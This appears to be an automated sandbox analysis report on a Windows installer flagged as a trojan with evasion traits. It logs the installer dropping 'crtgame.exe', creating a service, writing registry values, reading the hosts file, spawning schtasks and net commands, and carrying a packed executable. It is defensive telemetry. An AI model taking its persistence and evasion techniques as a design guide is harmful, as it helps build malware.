Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00477568 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00466ABC
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0047EFD8
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0043D5A4
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0046F68C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0048C110
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004301D0
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004442C4
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045E7EC
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045A894
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004449BC
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00468B44
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00434B1C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00430D5C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00444DC8
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00484ED4
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045101C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00443D1C
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00485E08
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00433E18
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_030E1EE0
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_030E1140
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_030E16B0
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 4_2_00401051
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 4_2_00401CBD
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C25F14
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C2EA06
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C448E9
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C3E065
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C42874
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C39944
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C3A6FA
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C3D759
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C37F02
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C3DC4D
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C5B85F
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C5B806
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C5BE57
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C5BE1D
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 004458F8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00405964 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00445628 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00406ACC appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00457114 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 004529A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00403684 appears 218 times
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: String function: 00456F08 appears 91 times
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: String function: 02C385A0 appears 37 times
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: String function: 02C44DF0 appears 138 times
Source: 6hvZpn91O8.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 6hvZpn91O8.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 6hvZpn91O8.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: 6hvZpn91O8.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 6hvZpn91O8.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: crtgame.exe.1.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: is-4264D.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-4264D.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-4264D.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-4264D.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: SpaceXRaces.exe.4.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: is-UMM6D.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-FGLVG.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-S02KC.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-RPUOD.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-2CGLR.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-OJ8GN.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-G7PIK.tmp.1.dr | Static PE information: Number of sections : 18 > 10
Source: 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs 6hvZpn91O8.exe
Source: 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs 6hvZpn91O8.exe
Source: 6hvZpn91O8.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: crtgame.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SpaceXRaces.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: is-HASL7.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9964533211297071
Source: is-KCF1P.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9976058467741935
Source: is-DQCHN.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.995148689516129
Source: is-BDC3N.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9908203125
Source: is-KANF7.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9903624487704918
Source: is-OMMAA.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9891526442307692
Source: is-58TJN.tmp.1.dr | Binary or memory string: ?..la..dll.Unknown error %u occurred.sln
Source: classification engine | Classification label: mal100.troj.evad.winEXE@16/128@1/2
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C302C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 4_2_00402548 lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0046D118 GetVersion,CoCreateInstance
Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGameJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2256:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeMutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmpJump to behavior
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: is-G7PIK.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-G7PIK.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-G7PIK.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-G7PIK.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-G7PIK.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: 6hvZpn91O8.exeVirustotal: Detection: 57%
                  Source: 6hvZpn91O8.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile read: C:\Users\user\Desktop\6hvZpn91O8.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\6hvZpn91O8.exe "C:\Users\user\Desktop\6hvZpn91O8.exe"
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp "C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp" /SL5="$10432,6991381,54272,C:\Users\user\Desktop\6hvZpn91O8.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /QueryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -iJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -sJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: 6hvZpn91O8.exeStatic file information: File size 7246011 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-BJBAO.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-HAM7K.tmp.1.dr

                  Data Obfuscation

                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 4.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 4.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress, 1_2_0044C030
                  Source: initial sample | Static PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.dr | Static PE information: section name: .hsave
                  Source: is-4NPOS.tmp.1.dr | Static PE information: section name: /4
                  Source: is-V8IE4.tmp.1.dr | Static PE information: section name: /4
                  Source: is-2CG7G.tmp.1.dr | Static PE information: section name: /4
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /4
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /19
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /31
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /45
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /57
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /70
